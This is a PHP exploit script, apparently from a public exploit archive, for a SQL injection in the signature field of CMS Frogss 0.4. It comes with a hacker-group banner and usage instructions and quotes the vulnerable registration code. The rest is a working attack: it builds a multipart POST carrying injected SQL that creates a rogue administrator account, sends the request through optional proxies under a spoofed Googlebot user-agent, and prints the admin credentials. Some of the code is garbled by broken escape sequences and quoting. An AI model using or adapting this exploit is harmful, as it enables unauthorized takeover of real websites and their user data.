CMS Frogss <= 0.4 (podpis) Remote SQL Injection Exploit

<?php
echo "+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~";
echo "+rn";
echo "-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -rnrn";
echo "+rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+rnrn";
echo "- CMS frogss <= 0.4 (podpis) SQL Injection Exploit [creat
new admin]"rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+"rn";
echo "- [Script name: CMS frogss v.0.4"rn";
echo "- [Script site:
 http://frogss.be/download.php?id=1"rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+"rn";
echo "-          Find by: Kacper (a.k.a Rahim)"rn";
echo "+"rn";
echo "-          Contact: <a href="mailto:kacper1964@yahoo.pl">kacper1964@yahoo.pl</a>"rn";
echo "-                        or"rn";
echo "-           http://www.rahim.webd.pl/"rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+"rn";
echo "- Special Greetz: DragonHeart ;-)"rn";
echo "- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi, nukedclx, mivus
;]"rn";
echo "+"rn";
echo "!@ Przyjazni nie da sie zamienic na marne korzysci
@!"rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+"rn";
echo "-            Z Dedykacja dla osoby,"rn";
echo "-         bez ktorej nie mogl bym zyc..."rn";
echo "-           K.C:* J.M (a.k.a Magaja)"rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "+"rn";
echo "Usage: www.site.com /path/ UserName Password proxy
"rn";
echo "ex: www.site.com <= site host "rn";
echo "ex: /path/ <= script path "rn";
echo "ex: Username <= exploit username "rn";
echo "ex: Password <= exploit password "rn";
echo "ex: proxy <= optional ;-) "rn";
echo "+"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";
echo "EX: www.site.com /frogss/ Evil hacker 127.0.0.1
"rn";
echo
"+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"rn";

/*
vulnerable code => module/rejestracja.php line 56-87:
....
function ok()
{
    global
$login,$haslo,$email,$miasto,$www,$gg,$tlen,$poziom,$podpis,$last_log,$logowan,$komentarzy,$odwiedzin,$ip,$lan;
    $query=mysql_query("SELECT login FROM uzytkownicy WHERE
login='".$login."'");
    if (!$login) {

    echo 'Nie poda³e¶ Loginu';
    } elseif (!$haslo){
        echo 'Nie poda³e¶ has³a';
    } elseif (!$email)
    {
        echo 'Nie poda³e¶ e-maila';
    } elseif(mysql_num_rows($query)==0)
{
if($www=='http://') $www = '';
if($gg=='gg:') $gg = '';
if($tlen=='tlen:') $tlen = '';
$haslomd5 = md5($haslo);
$ip = $_SERVER['REMOTE_ADDR'];
$query1 = "INSERT INTO uzytkownicy VALUES(NOT NULL, '$login',
'$haslomd5', '$email', '$miasto', '$www', '$gg', '$tlen', '$poziom',
'$podpis', NOW(), '$last_log', '$logowan', '$komentarzy', '$odwiedzin',
'offline', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '', '',
'', '0', '0', '0', '$ip')";
$result = mysql_query ($query1);
if($result)
        {
            echo '<br>'.$lan['registration_add'].'<br>';
        }
        else
        {
            echo
'<br>'.$lan['registration_add_error'].'<br><br>';
        }
}
else
{
....
when we register to new user in $podpis we can insert in  SQL injection
;-)

*/


error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
ob_implicit_flush (1);
function show($headeri)
{
  $ii=0;$ji=0;$ki=0;$ci=0;
  echo '<table border="0"><tr>';
  while ($ii <= strlen($headeri)-1){
    $datai=dechex(ord($headeri[$ii]));
    if ($ji==16) {
      $ji=0;
      $ci++;
      echo "<td>  </td>";
      for ($li=0; $li<=15; $li++) {
        echo
"<td>".htmlentities($headeri[$li+$ki])."</td>";
		}
      $ki=$ki+16;
      echo "</tr><tr>";
    }
    if (strlen($datai)==1) {
      echo
"<td>0".htmlentities($datai)."</td>";
    }
    else {
      echo "<td>".htmlentities($datai)."</td>
";
    }
    $ii++;$ji++;
  }
  for ($li=1; $li<=(16 - (strlen($headeri) % 16)+1); $li++) {
    echo "<td>  </td>";
  }
  for ($li=$ci*16; $li<=strlen($headeri); $li++) {
    echo
"<td>".htmlentities($headeri[$li])."</td>";
  }
  echo "</tr></table>";
}

$proxy_regex = '(bd{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}b)';

function sendpacket()
{
  global $proxy, $host, $port, $packet, $html, $proxy_regex;
  $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
  if ($socket < 0) {
    echo "socket_create() failed: reason: " .
socket_strerror($socket) . "<br>";
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {echo 'Not a valid proxy...';
    die;
    }
  echo "OK.<br>";
  echo "Attempting to connect to ".$host." on port
".$port."...<br>";
  if ($proxy=='') {
    $result = socket_connect($socket, $host, $port);
  }
  else {
    $parts =explode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $result = socket_connect($socket, $parts[0],$parts[1]);
  }
  if ($result < 0) {
    echo "socket_connect() failed.rnReason: (".$result.")
" . socket_strerror($result) . "<br><br>";
  }
  else {
    echo "OK.<br><br>";
    $html= '';
    socket_write($socket, $packet, strlen($packet));
    echo "Reading response:<br>";
    while ($out= socket_read($socket, 2048)) {$html.=$out;}
    echo nl2br(htmlentities($html));
    echo "Closing socket...";
    socket_close($socket);
  }
  }
}

function refresh()
{
  flush();
  ob_flush();
  usleep(5000000000);
}

function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.htmlentities($host); die;
    }
  }
  else {
	$c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid prozy...';die;
    }
    $parts=explode(':',$proxy);
    echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...<br>';
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
	}
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or
(!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);echo nl2br(htmlentities($html));
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$_POST[host];$port=$_POST[port];$path=$_POST[path];
$USER=$_POST[USER];$PASS=$_POST[PASS];$proxy=$_POST[proxy];

echo "<span class="Stile5">";

  if (($host<>'') and ($path<>''))
  {
    $port=intval(trim($port));
    if ($port=='') {$port=80;}
    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/'))
{die('Error... check the path!');}
    if ($proxy=='') {$p=$path;} else
{$p='http://'.$host.':'.$port.$path;}

  }
  if (($host<>'') and ($path<>'') and ($USER<>'') and
($PASS<>''))
  {
  
    $sql="') INSERT INTO uzytkownicy VALUES(1, Kacper,
b98092e78aa47e68ae2ba617137960a4, <a href="mailto:devilteam@hackers.pl">devilteam@hackers.pl</a>, NULL,
 http://www.rahim.webd.pl/, NULL, NULL, 0, DEVILTEAM, NOW(), 99999, 99999,
99999, 9999, offline, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, 0,
4)/*";
    $data='-----------------------------7d62702f250530
    Content-Disposition: form-data; name="login";
    
    '.$USER.'
    -----------------------------7d62702f250530
    Content-Disposition: form-data; name="haslo";
    
    '.$PASS.'
    -----------------------------7d62702f250530
    Content-Disposition: form-data; name="email";
    
    <a href="mailto:devilteam@polish-hackers.pl">devilteam@polish-hackers.pl</a>
    -----------------------------7d62702f250530
    Content-Disposition: form-data; name="miasto";
    
    localhost
    -----------------------------7d62702f250530
    Content-Disposition: form-data; name="www";
    
    http://www.rahim.webd.pl/
    -----------------------------7d62702f250530
    Content-Disposition: form-data; name="gg";
    
    000000
    -----------------------------7d62702f250530
    Content-Disposition: form-data; name="tlen";
    
    h20
    -----------------------------7d62702f250530--
    Content-Disposition: form-data; name="podpis";
    
    '.$sql.'
    -----------------------------7d62702f250530--
    ';

    $packet ="POST ".$p."login.php HTTP/1.1rn";
    $packet.="User-Agent: Googlebot/2.1rn";
    $packet.="Host: ".$host."rn";
    $packet.="Accept: text/plainrn";
    $packet.="Referer:
 http://".$host.$path."index.php?lang=enrn";
    $packet.="Content-Type: multipart/form-data;
boundary=---------------------------7d62702f250530rn";
    $packet.="Content-Length: ".strlen($data)."rn";
    $packet.=$data;
	$packet.="Connection: Closern";
    show($packet);
    sendpacketii($packet);
    if (!eregi("Location:",$html)) {die("Failed to
login...");}
    $temp=explode("Set-Cookie: ",$html);
    $COOKIE='';
    for ($i=1; $i<=6; $i++)
    {
      $temp2=explode(" ",$temp[$i]);
      $COOKIE.=" ".$temp2[0];
    }
   if (eregi("The user has successfully been added",$html))
{
  echo "exploit succeeded... now login as adminn";
  echo "with username "Kacper"" and password
"devilteam""n";
  echo ".$host."/Administracja/index.php"n";
  echo "Greetz ;-)"n";
}
?>